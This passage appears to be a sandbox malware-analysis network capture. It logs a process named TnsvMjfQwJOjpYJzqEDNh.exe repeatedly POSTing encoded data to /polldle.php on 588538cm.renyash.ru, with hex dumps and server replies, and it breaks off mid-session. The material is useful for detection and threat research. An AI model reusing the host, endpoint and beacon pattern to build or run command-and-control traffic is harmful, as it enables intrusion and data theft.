                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JNCaZ%2FGuNBh0XpbfJdbQNnsorRxbr6BdmThcpfPRBIZSYwhKkm862LWgwuam%2BWygVsR02jnlR%2FsrW2b7zEdQRjiBaZ%2BalZmRFbXLOI77K3DGs%2BoBXfEC0V0B%2BO%2FwOfY1Qwe8uIUi"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ea20a5872b7-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4811&min_rtt=1999&rtt_var=6374&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=59594&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                56192.168.2.450011104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:39.376337051 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:39.723578930 CET2504OUTData Raw: 5d 5a 54 54 5a 49 5a 5a 54 5d 55 5a 50 5d 59 5a 50 54 5a 5b 57 52 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTTZIZZT]UZP]YZPTZ[WRP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9#*B221)]3: ?>-8+(?$1 1,4$[5']+#X'/\/
                                                                                Jan 11, 2025 23:33:39.832396030 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:40.046155930 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:40.085486889 CET799INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:40 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNEpoFx9%2B9m9MZ5XD69C%2FoRwjS2TRI3QsI5oIf7CsPLyX9LkLVcr8tJ1noBLRc4Lq7QEsh%2BmcCbeZYdW12wNPOdFzky8JH4NPoFBB3mfHYq5NbTpxs8H5UIMRVZGaTBNpyu9EFel"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ea7ad9743f8-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3519&min_rtt=1721&rtt_var=4241&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=90649&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:40.175065994 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                57192.168.2.450017104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:40.507966042 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:40.864377975 CET2504OUTData Raw: 58 5d 54 5f 5f 42 5a 5d 54 5d 55 5a 50 59 59 5b 50 52 5a 53 57 51 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]T__BZ]T]UZPYY[PRZSWQPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-6B1+,]&16'&#/%-($),<%3,'8#!'X<#X'/\/0
                                                                                Jan 11, 2025 23:33:40.952601910 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:41.225157976 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:41 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KmoVnSl346pGD7qA8i5%2FDbgoOnPeThVYXmJq%2BgPPefGHQ8Yz7d2DeZsK3rLwU6VFzdLnYDs3p7HL297qZzBMzbo3iiYZ9BIl%2Fy8BYaFM8pe5B1f1fofbbs4MWdi8Jqk%2BHP6eUEyC"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eaebe7bc3fd-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1942&min_rtt=1502&rtt_var=1444&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=290489&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                58192.168.2.450023104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:41.353454113 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2496
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:41.707937956 CET2496OUTData Raw: 5d 5e 51 57 5a 42 5f 5b 54 5d 55 5a 50 5c 59 58 50 57 5a 58 57 5d 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^QWZB_[T]UZP\YXPWZXW]PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@93!18$\11*$Y)7-+(Y013%-$\6 *%#X'/\/,
                                                                                Jan 11, 2025 23:33:41.815372944 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:42.077035904 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fZcKd4b%2BLYfc5yug8k0S%2BsF91tF7wW7M8NSWuQVwJMVJ3qIer11xC16MNrEv8RKJYGzLmL106Fkyg3%2FyAESBruuSWnpeGTDkxoN0owLLfSjuu5W0VFxvGcUNSKFCqhL6ksBosXT4"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eb41d358c17-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4051&min_rtt=2188&rtt_var=4547&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=85395&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                59192.168.2.450032104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:42.210012913 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:42.567437887 CET2500OUTData Raw: 58 5d 54 5f 5a 48 5a 5b 54 5d 55 5a 50 5c 59 5e 50 5c 5a 5e 57 5c 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X]T_ZHZ[T]UZP\Y^P\Z^W\P^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 93!&8[%:01#,_87[??+&#%.446/*%#X'/\/<
                                                                                Jan 11, 2025 23:33:42.658232927 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:42.930460930 CET791INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:42 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XWJLhzSWRPJmp0VWWYQca0zpHgGK9fv6XwwOCAVvHXhrtJXlG5NOuo4ljruCq%2B9K1Dd8Kdyuota7zPZfzNmrZA5o9uxu%2FGiWvicYR02yv7hxAGTFVfoLo2Ka4Kf%2F7SdYq4TdM0QW"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eb95da4c46b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1549&rtt_var=1003&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=450895&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Jan 11, 2025 23:33:43.017524958 CET14INData Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                60192.168.2.450040104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:43.160162926 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:43.504868031 CET2504OUTData Raw: 5d 5d 54 50 5a 46 5f 5a 54 5d 55 5a 50 5b 59 51 50 5c 5a 5a 57 57 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TPZF_ZT]UZP[YQP\ZZWWPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- 5%?%T>32#%/(;+#U% ):'#!8<5#X'/\/
                                                                                Jan 11, 2025 23:33:43.604284048 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:43.852154016 CET815INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:43 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VPgM%2Fvbtu%2Bg%2BOu1N555T2Nbo4mpYh5qQDKz1Hobgc3%2BGiwEtxtC0gmlVBZVbXThUTYb2NGh%2BBwCSch8jr%2FyuzISMr3Szzh3HI0fIu%2BzssYvP9srUwNdEl8FWL5jMn3o641d%2FagCL"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ebf481f78d0-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8630&min_rtt=2060&rtt_var=13914&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=26726&cwnd=157&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                61192.168.2.450046104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:43.980196953 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:44.333153963 CET2504OUTData Raw: 5d 59 54 54 5f 46 5f 5b 54 5d 55 5a 50 58 59 5a 50 57 5a 58 57 55 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTT_F_[T]UZPXYZPWZXWUP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9:@%;<$"6$<5R",=/++T%W-#2X?#X'/\/4
                                                                                Jan 11, 2025 23:33:44.437129974 CET25INHTTP/1.1 100 Continue


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                62192.168.2.450047104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:43.980236053 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:44.333290100 CET1620OUTData Raw: 5d 5c 51 52 5f 42 5f 5c 54 5d 55 5a 50 54 59 5a 50 5c 5a 5b 57 57 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\QR_B_\T]UZPTYZP\Z[WWP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU :*$+$Z&">%?%T#&/ ((&.S.'!+?%#X'/\/
                                                                                Jan 11, 2025 23:33:44.442790985 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:44.601043940 CET958INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:44 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ip6jPlWJPtG%2Btgsa3fbL7kYNZ9PSxvgnF8xRmWixTKuoj3tg8YtjZAlXnsVGvqCzxXRYG98VNM%2FdRx7zYGqVkahPuLB%2F8cXfAXM2V579%2F9V5FNYE2GCgHi%2Fn5pgkfrhTblI1fb%2FV"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ec47923f3bb-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3480&min_rtt=1652&rtt_var=4275&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=89697&cwnd=81&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 53 30 1a 38 13 29 5f 2c 02 2e 06 3f 12 2c 21 3b 07 29 32 2a 5a 20 5f 3f 01 32 0c 28 57 2b 2a 31 06 3f 03 27 1f 34 10 3e 54 31 39 23 46 0c 1d 22 58 29 3c 2c 57 26 02 34 58 2b 0a 29 00 32 22 05 1b 28 37 3c 0d 3d 39 21 5c 35 3f 3d 0a 28 32 25 50 28 36 2a 19 2c 0f 30 02 31 00 2e 51 0f 16 21 1d 21 1f 30 59 34 04 3b 15 26 1e 2c 02 3f 1d 27 05 26 2a 2f 0a 2b 33 2d 00 2b 0c 20 57 33 2d 34 08 31 11 2d 04 3e 3a 20 0e 2b 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.S08)_,.?,!;)2*Z _?2(W+*1?'4>T19#F"X)<,W&4X+)2"(7<=9!\5?=(2%P(6*,01.Q!!0Y4;&,?'&*/+3-+ W3-41->: +;$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                63192.168.2.450053104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:44.733339071 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:45.091154099 CET2504OUTData Raw: 5d 59 54 53 5f 41 5a 5d 54 5d 55 5a 50 54 59 5f 50 52 5a 5b 57 56 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YTS_AZ]T]UZPTY_PRZ[WVP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#.#-&2%$/%4=Y,#_+?W1:$(^#!$(#X'/\/
                                                                                Jan 11, 2025 23:33:45.198509932 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:45.387228966 CET808INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:45 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BYhOqx7yCLI2qO8G9%2FjuIVp7cnsQsuEN6XJwNAm180xqWPUHeMgNE%2BKcPiksEYIBGpCwdrj5WkBh8LsgAt79y5WJ8bNQvgsqfl12%2BMjlOdVSXgVfZzcwbDiQ0Joag%2FTesvVdgZ1t"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ec93fd78cb3-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=5102&min_rtt=1977&rtt_var=6993&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=54108&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                64192.168.2.450057104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:45.624691010 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:45.973664045 CET2500OUTData Raw: 5d 5b 51 55 5a 43 5a 5d 54 5d 55 5a 50 5c 59 5f 50 50 5a 53 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][QUZCZ]T]UZP\Y_PPZSWTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#C9 .&83&!=0,-U"?9X,;#+U13)-7<!#+5#X'/\/
                                                                                Jan 11, 2025 23:33:46.072381020 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:46.308233976 CET805INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:46 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emKvOrxumgByNtYScuGrqRwszaAVddqngi%2FPQqgmoJgVqhKrjheXTGgfrPjsn6WZdAprzyrBd8jxezyVS%2FBqeF3yrWeL9FTP8ImsYbks%2BznhYgIhMUc9HxoXJrY28dtt26TPvVRH"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eceb9894340-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8479&min_rtt=1741&rtt_var=14129&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=26237&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                65192.168.2.450064104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:46.441922903 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:46.786094904 CET2504OUTData Raw: 5d 5e 54 50 5f 42 5a 5d 54 5d 55 5a 50 5f 59 5e 50 50 5a 5e 57 5c 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
